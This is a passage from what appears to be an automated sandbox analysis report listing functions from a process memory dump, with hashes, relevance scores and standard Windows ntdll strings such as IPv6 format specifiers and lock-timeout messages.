                                                                    • Instruction ID: 32c31f42f2782f689078e83531645b2b987f4a4f450583fd606a45a048a509d5
                                                                    • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                    • Instruction Fuzzy Hash: 20E02B3364134D8BC7148A99C101E43B7F8DFAA770F14847ECA4407202C230F843C6D4
                                                                    Function 2900CA38 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87d9a2c154b39b4370b80aaf728f8076939e06c6313996443e97169177c16243
                                                                    • Instruction ID: 0439889a4af6b46631e6b6c9559a92f164e7f52e50872445172febc841b9e2c1
                                                                    • Opcode Fuzzy Hash: 87d9a2c154b39b4370b80aaf728f8076939e06c6313996443e97169177c16243
                                                                    • Instruction Fuzzy Hash: 55D02B324C34746AD72CE614FC14F873B9ABB55760F014C71F108D2060E518CC8682E0
                                                                    Function 29054000 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                    • Instruction ID: b7b7cf25103ee42b230c576a6ab909e77c92f1e6d5056b7f72b7f31212f63a10
                                                                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                    • Instruction Fuzzy Hash: DCE0AE383002098BD709CF19C044BA277A6BFD5A10F24D478A9498F209EB32A843CA40
                                                                    Function 28FC8C8D Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                    • Instruction ID: 9ebbc7ab22322bce4b4acb0a99d41831e00789016fc53c366c9fc7738aebb745
                                                                    • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                    • Instruction Fuzzy Hash: A6E08C32413A25EED735DF16ED04F8277A6AB54B10F04882EA006868A08A70AA86CA85
                                                                    Function 28FC823B Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction ID: c409b210b4686694612777660323fa23aa6db065f37effae48fab098d3a2e9ed
                                                                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                    • Instruction Fuzzy Hash: D6E08C32412A24EED7315E29DC08F8277A3FB98B11F148C2AE0851A0A48771A9C2DA64
                                                                    Function 29008A90 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                    • Instruction ID: 08d12021de1eb5abbbe865b5bf794d445076a8ea96274e11659c9a97705c09b5
                                                                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                    • Instruction Fuzzy Hash: 1FE08633111A1887D718DE14D521B6677E4FF45760F05463EAA1347781C634E544C798
                                                                    Function 28FD2050 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47b2c397f9dddc9fa4cddf1bcfaa7274b03e3a23cb36fcd59c030559d6d6eb6f
                                                                    • Instruction ID: ae6c345a17eccb81ba716b5b8fc7901433731f4a89388e4875f63143836f877b
                                                                    • Opcode Fuzzy Hash: 47b2c397f9dddc9fa4cddf1bcfaa7274b03e3a23cb36fcd59c030559d6d6eb6f
                                                                    • Instruction Fuzzy Hash: F5E08C331015946BC219EA5DED00E5A739AEFA4660F084221B25597290DA24AC00C7D4
                                                                    Function 29026AA4 Relevance: .0, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                    • Instruction ID: 4afb4a22c4551c8b79db56252420750a978591246f91ad12a4526dcb0ae87777
                                                                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                    • Instruction Fuzzy Hash: B1D05E36512A50AFC3368F1BEA04D13BBF9FFC4A107050A7FA54683920C670EC06CBA0
                                                                    Function 29086ED0 Relevance: .0, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                    • Instruction ID: 77a7276216758b039d9562a200e1cf8666e3b7562f5a69f43371731926c75fba
                                                                    • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                    • Instruction Fuzzy Hash: 04D02E2820C2CCC3C60649888061BAA3F0E6742E44F2924BCC0440FE03CE174883E22A
                                                                    Function 2904E908 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                    • Instruction ID: 98f1ad488c8e9b01d276550e905fad030f611faba866fd17451aaccc91df1f93
                                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                    • Instruction Fuzzy Hash: 0AE08C36901684ABCF0ACF58C640F4EB7F5BF84B40F1408A8A1085B660C224EC01CB40
                                                                    Function 28FCA0E3 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction ID: 56dcf040ec6779893a77b69dfc48a89b63f6b8359b5e9e519d7e4b9bb8b81e4a
                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                    • Instruction Fuzzy Hash: 3BD02273217031A3CB1886646C04F537B079B80AA0F0A006C340AD3800C0048C52C6E0
                                                                    Function 2900A830 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                    • Instruction ID: 47702d2ff463c41d519706bebcdf437c48cccc01bd13b058d33f12ed560b90c5
                                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                    • Instruction Fuzzy Hash: F2D0123B1D054CBBCB119F65DC01F957BA9E764BA0F444020B509C75A0D63AE950D584
                                                                    Function 2900CA24 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b08709261d101a46ebea804f42c653200a08853130f42cecd955f39dcb7eb639
                                                                    • Instruction ID: 5a4d4dc4051034240f863798b1f930a527068f2b9a810b0067fc09054b636cd5
                                                                    • Opcode Fuzzy Hash: b08709261d101a46ebea804f42c653200a08853130f42cecd955f39dcb7eb639
                                                                    • Instruction Fuzzy Hash: F5D05E349010998BDF0ACB44C528D2E33B0FF50640B400878FA0092020E329C9028690
                                                                    Function 2900CF50 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e00a728dbbd978654da58184cd55ddbc76045e9f565c845072e6235403c28d91
                                                                    • Instruction ID: b3c2deb6a3f4cd26c92d40e2de4f5ed754cc320d02497cc8d2425824c07b39d9
                                                                    • Opcode Fuzzy Hash: e00a728dbbd978654da58184cd55ddbc76045e9f565c845072e6235403c28d91
                                                                    • Instruction Fuzzy Hash: 70D0A932000288ABC716EF48DD40F163BABEFA8B40F080020B50887222DA30FC60CA98
                                                                    Function 2900CF1F Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 972c85bcb8a782688664b24d080d59a27c4310a263f83e6e242ad4fda11e0a41
                                                                    • Instruction ID: b6b85f0780a75377d631aa4a1bb92d1a0dd6fc0f1390f6f80f792e5463e263d1
                                                                    • Opcode Fuzzy Hash: 972c85bcb8a782688664b24d080d59a27c4310a263f83e6e242ad4fda11e0a41
                                                                    • Instruction Fuzzy Hash: 70D05E72111440DFE72ACB08C946F3673E4FB10B04F4540B8B00ACB920C728E805DB80
                                                                    Function 28FE02A0 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction ID: b087c6d513e9cae53cb1afee1e81303b48e9de159ad339cbc509b851d1bb18b6
                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                    • Instruction Fuzzy Hash: 25D09275212A80DFC2068B18C5A0B0533E4BB84B84F8148A0E845CBB22D62CD940CA10
                                                                    Function 29086F00 Relevance: .0, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                    • Instruction ID: 6dc70b97d012b6e5f8f959816d571407c32638b83f380e712b48be014f357689
                                                                    • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                    • Instruction Fuzzy Hash: 41C02B2F1152C089CD078F3003133D0BFA0D7034C0F0D04C2D0C10F113C0148213C625
                                                                    Function 290A4DAD Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                    • Instruction ID: 3155d46bc181696d35d315bc3b8b66d265228cde08511be9f005965234f5c7bd
                                                                    • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                    • Instruction Fuzzy Hash: E7B01232213544CFD7025720CB00B1837AABF117C0F0900F0650089870E6288910E501
                                                                    Function 29012890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: c7b04120ed25980d63b0c23cc95c4a11e83c129013bf8daaa78be6faa35c9880
                                                                    • Instruction ID: 86fc545bafccaa25238cb71ec28441ad5e3f3c9959ac0717a2a76182a49d13c6
                                                                    • Opcode Fuzzy Hash: c7b04120ed25980d63b0c23cc95c4a11e83c129013bf8daaa78be6faa35c9880
                                                                    • Instruction Fuzzy Hash: C551B4B6E0411ABEDB14DB9C89D097EB7F8BF0C240B508A7AE464D7645D234DE42CBA0
                                                                    Function 29082410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 88c7fdf146f19aa1059e0adea21a0103a7ac651d79c68e5f59fbcb9cbe4b80f6
                                                                    • Instruction ID: 7bb19af56c806e4953e670beb605bf8880b4ef93f836b050a7c8fce631b9f3ab
                                                                    • Opcode Fuzzy Hash: 88c7fdf146f19aa1059e0adea21a0103a7ac651d79c68e5f59fbcb9cbe4b80f6
                                                                    • Instruction Fuzzy Hash: 6F5115B5B0065AAECB24CF9CC89097FB7F9BF48280B448C6AE495D3685E674DF418760
                                                                    Function 29007630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Execute=1, xrefs: 29044713
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 29044725
                                                                    • ExecuteOptions, xrefs: 290446A0
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 29044742
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 290446FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 29044655
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 29044787
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: 77fd364c471e1e5e476e247517e67b5329ef8a852225f30c1d5b4e5a83fe5f10
                                                                    • Instruction ID: 3c55f887322ebb99437a2c68af007cd117483628b7a172968feee9dd9390c6b0
                                                                    • Opcode Fuzzy Hash: 77fd364c471e1e5e476e247517e67b5329ef8a852225f30c1d5b4e5a83fe5f10
                                                                    • Instruction Fuzzy Hash: A7514B71A0020D7AEB159BA4DC95FAD33E9EF18740F4008B9D609E7191DB74AE83CF51
                                                                    Function 290A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                    • Instruction ID: 6996956165d6854eabfe2127ff0935c01efb48a2335107afcaf25875c9cf3ffb
                                                                    • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                    • Instruction Fuzzy Hash: 3A020671508345AFC305CFA8C890A6AB7F5EFD8740F009D6DFA898B254DB71E946CB92
                                                                    Function 2901B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction ID: e87e401468621d9c63c298e0479fc1ea9b8997e41b31ee52ba19da5bf626cd15
                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                    • Instruction Fuzzy Hash: 3081C270E4524D9FDB088F6CC8917EEBBF1AF55B50F144A6EE850A7299C7348983CB60
                                                                    Function 290820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: 7f414b371e2548de35a141dec5caca8070fdac9d4c661c4e005572633047517f
                                                                    • Instruction ID: 52151278ad9f216bf16522fd24f91cd670ddffb961d1631f09745ec03da66793
                                                                    • Opcode Fuzzy Hash: 7f414b371e2548de35a141dec5caca8070fdac9d4c661c4e005572633047517f
                                                                    • Instruction Fuzzy Hash: 27215176A0011DABDF04DF69CC50AAE7BFDFF68684F540526EA05E3204E7309A128BA1
                                                                    Function 28FFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 290402E7
                                                                    • RTL: Re-Waiting, xrefs: 2904031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 290402BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    • Opcode ID: 430040cc30fe00f03e32e5f2b2ba550eb7b306a99d3921d3828f6f7ae9629b7c
                                                                    • Instruction ID: cd15b7cd355920e0386fce2c53ed234e97397f15ad464b8bd0266276bf1649b5
                                                                    • Opcode Fuzzy Hash: 430040cc30fe00f03e32e5f2b2ba550eb7b306a99d3921d3828f6f7ae9629b7c
                                                                    • Instruction Fuzzy Hash: 62E1CB71A09745AFD314CF28C880F0AB7E2FF98324F154A39E5A49B6E1DB74D946CB42
                                                                    Function 2900BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 29047B7F
                                                                    • RTL: Resource at %p, xrefs: 29047B8E
                                                                    • RTL: Re-Waiting, xrefs: 29047BAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    • Opcode ID: a323ba30b7f7ee54cc7b374fc2a55e4265d306c97be7bd769183e62eaaa5a6e1
                                                                    • Instruction ID: 3b1b892f5f977cbdefc63fdc6e4282d40d26bd3dc1fc168813be9d83ea3f4029
                                                                    • Opcode Fuzzy Hash: a323ba30b7f7ee54cc7b374fc2a55e4265d306c97be7bd769183e62eaaa5a6e1
                                                                    • Instruction Fuzzy Hash: 3C41E331B0170A9FDB14CE25C850B6AB7E6EF98710F000E3DF95A97681EB31E946CB91
                                                                    Function 2900B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2904728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 29047294
                                                                    • RTL: Resource at %p, xrefs: 290472A3
                                                                    • RTL: Re-Waiting, xrefs: 290472C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    • Opcode ID: 9a0c957e159198239edeacf0099312d9170be68a9f35c089d75706c6edd13be9
                                                                    • Instruction ID: 3c6e8e64729d35da936797d243751ecf9bda53fdf74c70b83641861c539002fe
                                                                    • Opcode Fuzzy Hash: 9a0c957e159198239edeacf0099312d9170be68a9f35c089d75706c6edd13be9
                                                                    • Instruction Fuzzy Hash: 1941CE31A0120AABDB14CE25CD41F5AB7E5FFA4710F105E29F955AB280EB21F943CBD1
                                                                    Function 29082300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$]:%u
                                                                    • API String ID: 48624451-3050659472
                                                                    • Opcode ID: 1c48d30d2fb7d45b27769c2c6da82a0990ba0563669949ea570cf1dcef3ed1f2
                                                                    • Instruction ID: 4c1da6039557bd4850ecb6eed2e3e9c990da9a31a9f980a037cda2e67ec7e4d2
                                                                    • Opcode Fuzzy Hash: 1c48d30d2fb7d45b27769c2c6da82a0990ba0563669949ea570cf1dcef3ed1f2
                                                                    • Instruction Fuzzy Hash: EF317376A0021DAECB14CE2DCC50BAE77F8BF58650F854966E949E3240EB309E459BA0
                                                                    Function 29017D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
